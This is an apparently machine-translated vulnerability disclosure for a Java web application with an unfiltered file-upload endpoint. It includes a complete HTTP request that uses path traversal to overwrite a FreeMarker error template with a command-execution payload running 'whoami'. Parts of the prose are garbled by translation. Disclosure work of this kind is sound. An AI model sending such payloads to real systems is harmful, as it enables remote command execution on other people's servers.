There is a command execution vulnerability in the system

[haioudelibaiyi]

Vulnerability exploitation points:
Loophole dot com. Wstro. Controller. SysFileController# upload, without any filtering, you can upload any loophole
The path does not belong to "/admin/", and any user can access /file/

And in Java, there exists "springfreemarker".

Because of the existence of "springfreemarker", by default, FreeMarker cannot directly access Java classes, but in some cases, it can be used? New access to the system class in a FreeMarker, FreeMarker template. The utility. The Execute class allows execution system command, you can upload at this time. FTL format file, Overwrite its src/main/webapp/WEB-INF/templates/error.ftl, and execute the system command "whoami", and the result will be back-displayed on the page, eventually causing a command execution vulnerability.

The final vulnerability payload is:
POST /file/upload HTTP/1.1
Host: localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAqZf05643BuD8TBp
Connection: close
Content-Length: 565
------WebKitFormBoundaryAqZf05643BuD8TBp
Content-Disposition: form-data; name="portraitFile"; filename="/../../../../WEB-INF/templates/error.ftl"
Content-Type: image/png

<#assign cmd = "whoami"> <#assign className = "freemarker.template.utility.Execute"?new()> ${className(cmd)} � ------WebKitFormBoundaryAqZf05643BuD8TBp Content-Disposition: form-data; name="file_id" 0 ------WebKitFormBoundaryAqZf05643BuD8TBp Content-Disposition: form-data; name="uploadType" 0 ------WebKitFormBoundaryAqZf05643BuD8TBp--

When we access a non-existent path and trigger the error.ftl file, we can directly execute the "whoami" command.